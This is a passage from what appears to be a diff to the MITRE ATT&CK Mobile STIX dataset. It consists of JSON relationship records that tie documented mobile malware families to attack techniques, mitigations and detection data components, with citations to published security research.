"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4efa4953-7854-4144-8837-d7831ccbe35d", + "type": "relationship", + "created": "2020-04-24T17:46:31.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.691Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect a list of installed applications.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f4f4660c-6324-4da4-be2f-ac87fda85a45", + "created": "2019-09-15T15:32:17.580Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Notification Listeners", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager#setPermittedCrossProfileNotificationListeners(android.content.ComponentName,%20java.util.List%3Cjava.lang.String%3E)", + "description": "Android. (n.d.). DevicePolicyManager. Retrieved September 15, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "On Android devices with a work profile, the `DevicePolicyManager.setPermittedCrossProfileNotificationListeners` method can be used to manage the list of applications running within the personal profile that can access notifications generated within the work profile. This policy would not affect notifications generated by the rest of the device. The `DevicePolicyManager.setApplicationHidden` method can be used to disable notification access for unwanted applications, but this method would also block that entire application from running.(Citation: Android Notification Listeners) ", + "modified": "2022-04-01T14:50:28.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--38f37e3f-1d4b-4f04-b176-1cae6d22931e", + "type": "relationship", + "created": "2020-12-14T14:52:03.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T14:52:03.310Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can send SMS messages.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f", + "created": "2023-03-20T18:58:33.787Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:33.787Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cbb48fa1-0677-4a07-bdbf-eda1827e52f1", + "created": "2020-10-29T17:48:27.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:18:05.613Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can lock the device with a password and permanently disable the screen.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54151897-cc7e-4f92-af50-bed41ea78d92", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:20.968Z", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eba4b561-84c9-4d49-a8b8-1842c3ed94f3", + "created": "2023-02-06T19:01:39.599Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:25:11.903Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself contact list access.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--35453bbb-c9b3-4421-8452-95efdd290d21", + "type": "relationship", + "created": "2021-01-20T16:01:19.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zimperium z9", + "url": "https://blog.zimperium.com/how-zimperiums-z9-detected-unknown-mobile-malware-overlooked-by-the-av-industry/", + "description": "zLabs. (2019, November 12). How Zimperium’s z9 Detected Unknown Mobile Malware Overlooked by the AV Industry . Retrieved January 20, 2021." + } + ], + "modified": "2021-01-20T16:01:19.323Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect a list of running processes.(Citation: Zimperium z9)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--12852406-87df-4892-a177-e15e81739000", + "created": "2023-03-20T18:50:14.139Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:14.139Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4ef35e9-3dba-49c7-8842-a7dff403241f", + "type": "relationship", + "created": "2020-12-17T20:15:22.445Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.445Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s camera.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce51f1b3-7813-4517-bbcf-7ae8abf6d2ef", + "created": "2020-07-27T14:14:56.993Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Zen](https://attack.mitre.org/software/S0494) can simulate user clicks on ads.(Citation: Google Security Zen)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d910b1c-df72-4fcb-9d9e-0bb666c9c108", + "created": "2023-03-20T18:57:17.059Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:17.059Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--afc0e8b2-2e85-4640-8517-fb2e16831082", + "created": "2023-01-18T19:45:27.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:56:03.190Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use a WebView with a fake log in site to capture banking credentials.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0cfbea52-d6ab-467f-97e5-8c74b332b16f", + "created": "2020-12-24T21:55:56.749Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:52.454Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has hidden its app icon.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9b262ba-1c32-40b3-8622-121b30d6df50", + "type": "relationship", + "created": "2019-10-10T15:14:57.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-10T15:14:57.378Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can extract information on pictures from the Gallery, Chrome and SBrowser bookmarks, and the connected WiFi network's password.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cce82a76-5390-473d-9e7c-9450d1509d1d", + "type": "relationship", + "created": "2020-07-15T20:20:59.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.314Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can download its second (Loader) and third (Core) stages after the dropper is installed.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--94040d2e-3f60-423c-8a93-a83b61cafe7d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) update and sends the location of the phone.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--54dac52d-5279-407f-b7b4-5484ae90b98c", + "type": "relationship", + "created": "2021-02-17T20:43:52.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.402Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has downloaded and installed additional applications.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4896e256-fb04-403c-bbb7-2323b158a6e0", + "created": "2022-03-30T19:52:05.143Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:52:05.143Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f6770c26-ae93-468d-acaa-ab4ffea0e047", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.682Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record phone calls and surrounding audio.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e8c833ee-4c7d-45a2-b29b-187fe3661c0d", + "created": "2020-12-17T20:15:22.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:55:35.453Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s contact list.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c49cdcb7-3cb8-40ed-a745-0cebad20b1fd", + "type": "relationship", + "created": "2020-05-04T14:04:56.214Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.076Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) has used native code in an attempt to disguise malicious functionality.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57e441f8-6799-4d1b-8e2a-13d8ac1c8e78", + "created": "2023-02-28T20:37:59.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:08:37.122Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can obfuscated class, string, and method names in newer malware versions.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bee6407a-1f05-4f91-b6e7-a8f8b58fa421", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "modified": "2019-10-09T14:51:42.827Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) encodes strings into binary arrays to make it difficult to inspect them. It also loads code from encrypted resources dynamically and includes meaningless commands that mask the actual commands passing through.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4735277-516a-4cd2-9607-a3e415945d93", + "type": "relationship", + "created": "2020-11-10T17:08:35.800Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:20.494Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can remotely capture device audio.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3565140f-1570-494d-9d6f-91c9203ece69", + "created": "2023-03-20T18:52:29.821Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:29.821Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f65087b4-adf2-4292-a711-7ae829e91397", + "type": "relationship", + "created": "2019-09-04T14:28:16.385Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.877Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can list applications installed on the device.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c3296f6-3520-4d1b-8b57-bdd48a5aac91", + "created": 